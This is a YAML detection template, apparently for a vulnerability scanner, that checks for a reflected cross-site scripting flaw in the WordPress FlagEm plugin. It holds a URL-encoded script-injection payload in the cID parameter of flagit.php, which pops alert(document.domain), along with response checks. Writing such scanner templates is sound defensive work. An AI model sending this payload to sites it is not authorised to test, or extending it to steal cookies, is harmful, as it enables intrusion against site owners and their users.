product: WordPress
vName: WordPress FlagEm - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress FlagEm plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/38674
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
